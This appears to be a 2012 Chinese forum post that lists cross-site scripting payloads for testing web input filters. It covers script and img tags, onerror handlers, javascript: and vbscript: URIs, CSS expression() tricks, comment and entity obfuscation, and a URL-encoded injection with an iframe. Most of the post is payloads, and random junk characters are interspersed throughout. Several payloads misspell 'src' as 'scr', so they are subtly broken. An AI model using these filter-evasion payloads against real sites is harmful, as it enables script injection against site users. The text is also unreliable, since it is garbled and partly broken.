<script>alert("跨站")</script> (最常用)
& \# D+ ?- Z' Y% F: g- e<img scr=javascript:alert("跨站")></img>
: S0 C# i0 N, H3 W2 o( h<img scr="javascript: alert(/跨站/)></img>+ i8 Z- W, P* n5 [) L5 z; g
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格) h9 Y! y8 \, \( F- ^* C! M
<img scr="#" onerror=alert(/跨站/)></img>- Z, r( x2 a. Z8 \) [' z
<img scr="#" style="xss:expression(alert(/xss/));"></img>
, X }4 v) v, F5 u! p<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
% F! E7 V- W# a8 q) K9 `$ H" m; U" a<img src=vbscript:msgbox ("xss")></img>& E% k9 d' a7 |; Y! W! G5 A: @, A/ @
<style> input {left:expression (alert('xss'))}</style>! ?1 d6 d! _% K7 n, B1 n
<div style={left:expression (alert('xss'))}></div>
; b+ e- }8 O; O" r<div style={left:exp/* */ression (alert('xss'))}></div>8 C4 r$ z6 @' Q) a+ ^
<div style={left:\0065\0078ression (alert('xss'))}></div>: I7 b2 {2 J8 o9 A6 r1 `+ B1 `2 ^4 L
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
6 H4 q/ `$ I2 E4 I% w# _* qunicode <div style="{left:expRessioN (alert('xss'))}">
$ h! B4 y! p4 t& B9 E& ~% g. `- E0 ~
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["2 }- @ g* C% S
|
发表于 2012-9-15 14:09:13
收藏
支持
反对